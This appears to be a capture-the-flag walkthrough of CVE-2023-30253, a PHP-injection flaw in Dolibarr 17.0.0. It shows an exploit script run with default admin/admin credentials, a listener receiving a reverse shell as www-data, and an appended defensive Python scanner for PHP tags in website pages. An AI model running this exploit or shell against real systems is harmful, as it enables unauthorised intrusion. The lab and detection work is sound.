CVE-2023-30253 Dolibarr RCE
Dolibarr is an open-source enterprise resource planning (ERP) and customer relationship management (CRM) platform; its source code is available on GitHub.
1. Quick exploitation
Version: 17.0.0
Requirement: a valid account and password (default credentials: admin / admin)
┌──(root㉿kali)-[~/Desktop/htb/BoardLight/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253]
└─# python exploit.py http://crm.board.htb admin admin 10.10.14.74 4444
[*] Trying authentication...
[**] Login: admin
[**] Password: admin
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# penelope -p 4444
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.8.18 • 172.19.0.1 • 172.17.0.1 • 10.10.14.74
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from boardlight~10.129.9.143-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/sessions/boardlight~10.129.9.143-Linux-x86_64/2025_12_19-09_27_17-237.log 📜
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$ whoami
www-data
2. Details
https://www.tinextacyber.com/security-advisory-dolibarr-17-0-0/
HTB: BoardLight | 0xdf hacks stuff
A user holding the "read website content" and "create/modify website content (HTML and JavaScript content)" permissions can "bypass application restrictions through PHP code injection and execute remote commands". In other words, such a user is not supposed to be able to create PHP pages, but this vulnerability lets them do exactly that.
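An added defender-side check, not part of the original post or of Dolibarr itself: it audits website page content for embedded PHP open tags, which should never appear in pages created by the website module. PHP accepts its open tag in any letter case, so the match is case-insensitive; the page names and HTML below are constructed sample data, and where the content is read from (a database export or the on-disk page files) is left to the caller.

```python
import re

# PHP open tags in any letter case: "<?php"/"<?PHP", the echo tag "<?=",
# and the short tag "<?" followed by whitespace. "<?xml" is deliberately
# not matched so XML prologs in legitimate content do not raise findings.
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=|\s)", re.IGNORECASE)


def find_php_tags(html):
    """Return a list of (line_number, snippet) for every PHP open tag in html."""
    hits = []
    for lineno, line in enumerate(html.splitlines(), start=1):
        for m in PHP_OPEN_TAG.finditer(line):
            start = max(0, m.start() - 10)
            hits.append((lineno, line[start:m.end() + 20]))
    return hits


def audit_pages(pages):
    """Scan a mapping of page name -> HTML content.

    Returns only the pages that contain findings, so an empty dict means clean.
    """
    findings = {}
    for name, html in pages.items():
        hits = find_php_tags(html)
        if hits:
            findings[name] = hits
    return findings


# Constructed sample content (hypothetical pages, not taken from a real site).
SAMPLE_PAGES = {
    "home": "<html><body><h1>Welcome</h1><p>Plain HTML only.</p></body></html>",
    "contact": "<div>Email us</div>\n<?PHP echo 'injected'; ?>\n<p>end</p>",
    "news": '<p>XML prolog example: <?xml version="1.0"?></p>',
}

if __name__ == "__main__":
    for page, hits in audit_pages(SAMPLE_PAGES).items():
        for lineno, snippet in hits:
            print(f"{page}: line {lineno}: {snippet!r}")
```

Run it against a dump of every website page after a suspected compromise, or on a schedule, and treat any finding as a page that needs review and removal.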